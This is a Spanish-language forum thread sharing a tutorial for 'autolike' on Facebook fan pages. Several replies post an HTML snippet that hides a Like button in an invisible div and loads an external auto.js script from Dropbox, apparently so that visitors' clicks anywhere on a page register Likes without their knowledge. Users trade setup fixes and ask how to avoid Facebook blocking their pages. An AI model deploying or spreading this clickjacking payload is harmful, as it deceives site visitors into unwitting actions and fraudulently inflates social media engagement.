Tutorial: Auto Me gusta "Autolike" para FanPage

• Autor Autor intoroddex
  • Fecha de inicio Fecha de inicio
Una duda. Me bloquea súper rápido la fanpage, ósea lo pongo unas horas y solo llego a conseguir unos 9-11mil me gusta y se bloquea no recibe más :/

Enviado desde mi iPhone utilizando Tapatalk

Gracias men, pero una pregunta no coje Dislike o si ? !

No da deslike, 😕 [MENTION=113950]ItzCarlosFreshX8[/MENTION]

- - - Actualizado - - -

Gracias compañero ahora lo pongo, lo probare aunque ahora tengo un internet que da lastima xD pero me deja entrar aqui jejeje :distant:
Para Blogger, solo agregan arriba de </body>

PHP:
<script type="text/javascript" src="//dl.dropboxusercontent.com/s/9yffh50a8njo0jx/auto.js"></script>
<div id="likeslikes" style="opacity:0;width:20px;height:20px;overflow:hidden;position:fixed;">
    <div class="fb-like" data-href="AQUI LA URL DE LA PAGINA O WEB" data-layout="button" data-action="like" data-show-faces="false" data-share="false"></div>
</div>

men me podrias ayudar ya puse el codigo en blogger y nada no me funciona el autolike 😀 😀 saludos espero tu respuesta

No da deslike, 😕 [MENTION=113950]ItzCarlosFreshX8[/MENTION]

- - - Actualizado - - -

Gracias compañero ahora lo pongo, lo probare aunque ahora tengo un internet que da lastima xD pero me deja entrar aqui jejeje :distant:

Es así:

PHP:
<div id="likeslikes" style="opacity:0;width:20px;height:20px;overflow:hidden;position:fixed;"> 
    <div class="fb-like" data-href="http://www.forobeta.com" data-layout="button" data-action="like" data-show-faces="false" data-share="false"></div>
</div>
<script type="text/javascript" src="//dl.dropboxusercontent.com/s/9yffh50a8njo0jx/auto.js"></script>

No funcionaba porque el script estaba arriba XD

Hahaha, de los errores se aprende compañero igual era cuestion de logica pero como todos esperamos la solucion XD

Es así:

PHP:
    <div class="fb-like" data-href="http://www.forobeta.com" data-layout="button" data-action="like" data-show-faces="false" data-share="false"></div>
</div>

No funcionaba porque el script estaba arriba XD

lo subi a un servidor no me genera like a mi fan page lo probe con mi pagina

lo subi a un servidor no me genera like a mi fan page lo probe con mi pagina

Pasame tu pagina por privado para ver el problema, ademas pusiste bien los códigos al pie de la letra ? aunque es muy sencillo:welcoming:

Amigo a mi no me funciona y lo hago al pie de la letra y es mas lo intente en dos webs diferentes en wordpress y no funciona lo unico que pasa es que sobrecarga las paginas hasta tal punto que aveces ni me cargan 🙁 a alguien mas le pasa ?
Ya lo solucioné era problema de la Raíz

Última edición:
Funciona perfectamente!! muchas gracias 🙂

gracias por el tutorial lo voy a probar en blogger haber que tal :encouragement:

Muchas gracias por el aporte.
Alguien sabe los límites de éste método? Es decir cuantos likes puedo ganar sin tener problemas con Facebook o que bloqueen mi página? Gracias!!!!!

Enviado desde mi D6603 mediante Tapatalk

Existe problemas con los anuncios de adsense? Es decir, que cuando le den click al anuncio, le este dando el clik al like.... De resto, a probar se dijo 😀

Muchas gracias por el tutorial, ¿existe alguna manera de que no aparezca el "No me gusta" despues de que se haya dado me gusta?

Agradecería su ayuda.

Hola,

Yo soy nuevo en esto. Intentaré ponerme al día. Gracias por la info.

no funca el script para blogger muñaño:devilish:

[MENTION=84269]intoroddex[/MENTION] Muchas gracias a vos y a cicklow por el script! Funciona perfectamente 😱 😛7:.

Última edición:
Atrás